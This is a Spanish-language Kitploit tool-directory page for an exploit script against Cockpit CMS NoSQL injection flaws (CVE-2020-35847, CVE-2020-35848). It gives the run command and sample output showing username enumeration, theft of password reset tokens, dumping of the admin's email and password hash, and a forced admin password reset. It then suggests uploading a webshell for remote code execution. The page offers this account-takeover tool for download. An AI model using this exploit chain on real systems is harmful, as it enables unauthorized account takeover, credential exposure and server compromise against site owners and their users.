Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-35847_CVE-2020-35848 — CVE-2020-35847, CVE-2020-35848 : Toma de Control de Cuenta | Kitploit
Herramientas/GitHubGitHub/w33vils/cve-2020-35847_cve-2020-35848
ReconocimientoAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de Información
GitHubw33vils/cve-2020-35847_cve-2020-35848

CVE-2020-35847_CVE-2020-35848

CVE-2020-35847, CVE-2020-35848 : Toma de Control de Cuenta

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
21hace 3 añosAún no revisado
Compartir

Cockpit CMS Inyección NoSQL (CVE-2020-35847, CVE-2020-35848)

Cockpit CMS anterior a la versión 0.11.2 es vulnerable a una inyección NoSQL en las rutas /auth/resetpassword y /auth/newpassword que permite la extracción de tokens de restablecimiento de contraseña, lo que posibilita la enumeración de detalles de usuario y el restablecimiento de contraseña.

Leer más - https://swarm.ptsecurity.com/rce-cockpit-cms/

Este script de Python enumera usuarios en el sistema y restablece la contraseña.

Uso

root@kitploit:~
python3 exploit.py -u http://cockpit-site-url

El script primero enumera usuarios en el sistema.

root@kitploit:~
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'user1', 'user2', 'user3']

Luego puedes elegir de qué usuario obtener más información. Esto también genera tokens de restablecimiento para ese usuario, un requisito clave para el restablecimiento de contraseña.

root@kitploit:~
[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : [email protected]
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------

Finalmente, puedes elegir restablecer la contraseña del usuario.

root@kitploit:~
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : new_random_password

Luego puedes elegir subir una webshell al componente /finder para obtener RCE.

Descargar herramienta